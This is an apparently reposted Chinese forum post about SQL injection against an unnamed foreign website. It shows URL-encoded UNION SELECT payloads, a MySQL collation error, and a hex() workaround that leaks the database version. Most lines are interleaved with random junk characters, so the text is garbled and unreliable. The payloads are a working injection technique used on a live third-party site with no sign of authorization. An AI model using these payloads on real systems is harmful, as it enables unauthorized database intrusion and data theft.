本文作者:SuperHei, u! I' l' m0 \ i- ~, ~- e" r9 R9 K8 A
文章性质:原创' Q. F8 Y0 { h5 ? [* `! |
发布日期:2005-10-18' q- Y2 p9 E- M \) `& v) P
测试个国外的站时:9 r+ h4 R& N: V$ g9 k$ w
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*" l9 x, Y: w" m
返回错误:
( o- U4 X7 c+ z' K1 jIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
1 R' Q7 D7 k; r, m4 X; m) k7 VMySQL Error No. 126
G- X6 {2 `$ D: v! }看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。0 A# G# a, b: L& O
解决办法:转为其他编码如hex。
" P! d j- Y4 k- w7 ~url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*9 ^7 P) I: ~; a3 e$ j
成功得到hex(version())的值为:. x: ?! Z! E2 U9 z
342E312E332D62657461 ?" @1 z. M" x
回Mysql查询下得到:
6 v' S) R @4 y/ }. `& umysql> select 0x342E312E332D62657461;0 f8 q$ c6 {+ W1 f
+------------------------+
$ V! {5 F& a/ s| 0x342E312E332D62657461 |$ x/ t h* }) @
+------------------------+8 y. ?& Q V2 }
| 4.1.3-beta |% S: F/ G: U- q {
+------------------------+0 I2 C6 T6 [& z$ V5 X* E
1 row in set (0.00 sec)
9 K4 r$ }2 O- |
- E* x* D+ J# H" m |
发表于 2012-9-15 14:04:54
收藏
支持
反对